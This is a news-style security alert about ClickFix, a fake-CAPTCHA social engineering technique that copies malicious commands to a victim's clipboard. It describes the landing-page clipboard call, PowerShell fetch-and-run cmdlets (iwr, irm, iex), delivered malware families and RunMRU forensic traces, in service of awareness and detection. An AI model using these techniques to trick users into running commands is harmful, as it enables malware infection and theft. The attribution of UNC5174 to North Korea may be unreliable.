Cross-platform vulnerability alert: Microsoft issues warning about joint attacks targeting Windows and macOS systems via ClickFix exploit

In the ever-evolving world of cybersecurity, a new threat has emerged that is causing concern among security experts worldwide. This threat is known as ClickFix, a social engineering technique that has been observed in attack campaigns since early 2024.

ClickFix is a cunning method used by attackers to disguise malicious commands within seemingly harmless tasks. One such task is the CAPTCHA verification, which is included in ClickFix commands such as "Cloud-Identifier:XXXX" or "# Human, not robot: CAPTCHA: Verification ID: XXXX".

The attackers' modus operandi often involves phishing, malvertising, or drive-by infections, often under the guise of well-known brands. For instance, the social engineering technique ClickFix has been used by the North Korean state-sponsored APT group UNC5174 against thousands of companies and end-user devices worldwide.

The ClickFix landing page, often spoofing a Discord server, uses the Discord logo image file to create an impression of legitimacy. Once a user clicks the "Verify" button on this fake landing page, the HTML code's "addEventListener" method triggers, allowing the malicious command to be copied to the user's clipboard with "navigator.clipboard.writetext(command)".

Many of these payloads are "fileless", meaning they are not stored as classic executable files on the hard drive. This makes them harder to detect and remove.

Microsoft Defender XDR is said to provide protection across multiple stages of the ClickFix attack chain. However, the spread of ClickFix is rapid, and it is now being used daily in attack campaigns against thousands of corporate and end-user devices worldwide.

Malicious ClickFix commands often use PowerShell, "iwr" (Invoke-WebRequest), "irm" (Invoke-RestMethod), and "iex" (Invoke-Expression) in PowerShell. URLs are often shortened using services like Bitly in ClickFix commands.

Attackers also exploit compromised websites to distribute the ClickFix landing page. Malvertising is another popular method used to direct users to ClickFix landing pages. One example of a phishing campaign using URLs and redirections was observed in June 2025, where the campaign posed as the US Social Security Administration and combined social engineering and domain spoofing to spread ScreenConnect.

In June 2025, a ClickFix campaign targeted macOS users to spread Atomic macOS Stealer (AMOS). Observed examples of malware in ClickFix attacks include infostealers such as Lumma Stealer, remote access trojans such as Xworm and AsyncRAT, loaders such as Latrodectus and MintsLoader, and rootkits based on modified open-source code such as r77.

Users are advised to be vigilant and to verify the authenticity of any requests for CAPTCHA verifications or other seemingly harmless tasks. Entering commands in the "Run" dialog leaves forensic traces, particularly in the "RunMRU" (Most Recently Used) registry key. Suspicious elements in entries within this registry key may indicate a ClickFix attack.

Stay safe online!

Cross-platform vulnerability alert: Microsoft issues warning about joint attacks targeting Windows and macOS systems via ClickFix exploit